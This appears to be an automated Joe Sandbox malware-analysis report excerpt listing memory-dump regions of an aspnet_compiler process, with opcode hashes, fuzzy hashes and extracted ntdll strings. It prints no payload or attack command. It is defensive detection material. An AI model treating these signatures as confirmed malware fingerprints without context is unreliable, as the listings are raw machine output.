                                                • Opcode ID: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction ID: bea31e52b4947098166a5853b381437c0ce687cada8622438d1654f6fc3cd67c
                                                • Opcode Fuzzy Hash: 5d06e62ecc0ccff2d82fb33389f73f013fdf3a2f5ea46d36b3417402e9c0144c
                                                • Instruction Fuzzy Hash: B2B01272140540C7E3099714DA1AB5B7210FB80F00F008D3AE04781891DB7C9A2CD486
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                                                • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                                                • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                                                • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                                                • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                                                • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                                                • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                                                • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                                                • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                                                • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                                                • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                                                • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                                                • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                                                APIs
                                                Strings
                                                • Kernel-MUI-Language-Disallowed, xrefs: 00938914
                                                • Kernel-MUI-Language-Allowed, xrefs: 00938827
                                                • WindowsExcludedProcs, xrefs: 009387C1
                                                • Kernel-MUI-Language-SKU, xrefs: 009389FC
                                                • Kernel-MUI-Number-Allowed, xrefs: 009387E6
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: _wcspbrk
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 402402107-258546922
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: _wcsnlen
                                                • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                                                • API String ID: 3628947076-1387797911
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                APIs
                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00963F12
                                                Strings
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00963F4A
                                                • Execute=1, xrefs: 00963F5E
                                                • ExecuteOptions, xrefs: 00963F04
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00963F75
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00963EC4
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0096E2FB
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 0096E345
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: BaseDataModuleQuery
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 3901378454-484625025
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: __fassign
                                                • String ID: .$:$:
                                                • API String ID: 3965848254-2308638275
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0097EA22
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490
                                                • ___swprintf_l.LIBCMT ref: 0095156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
                                                • Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: fbe8fa56723f82032111c96f1f5e723faa032c57aaff9d1ba3bbba6aab120828
                                                • Instruction ID: 7e70bd1126ba383191b9f1ad0095bfcc1372703c51a42506c6d50f82a20560bc
                                                • Opcode Fuzzy Hash: fbe8fa56723f82032111c96f1f5e723faa032c57aaff9d1ba3bbba6aab120828
                                                • Instruction Fuzzy Hash: 9021A172A0021AABCB10EE698D45AEF77AC9B94764F048526FC05A3141EB74DE54C7E1
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 00972328
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
                                                • RTL: Resource at %p, xrefs: 0097230B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
                                                • Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90
                                                Strings
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009724BD
                                                • RTL: Re-Waiting, xrefs: 009724FA
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0097248D
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmp
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                • Instruction ID: de123f56b8b9317c40485bac626a5db3d158d5a5df3137b3a6874b3cedfed3e7
                                                • Opcode Fuzzy Hash: bf889ee6526b5e04db1a6df24ec051e8f62332daa287468955fc5791fbecdb26
                                                • Instruction Fuzzy Hash: 9341E771604204ABDB20DB68CC85FAA77BDEF84720F20CA05F5599B2D1D775E9418B60
                                                APIs
                                                Memory Dump Source
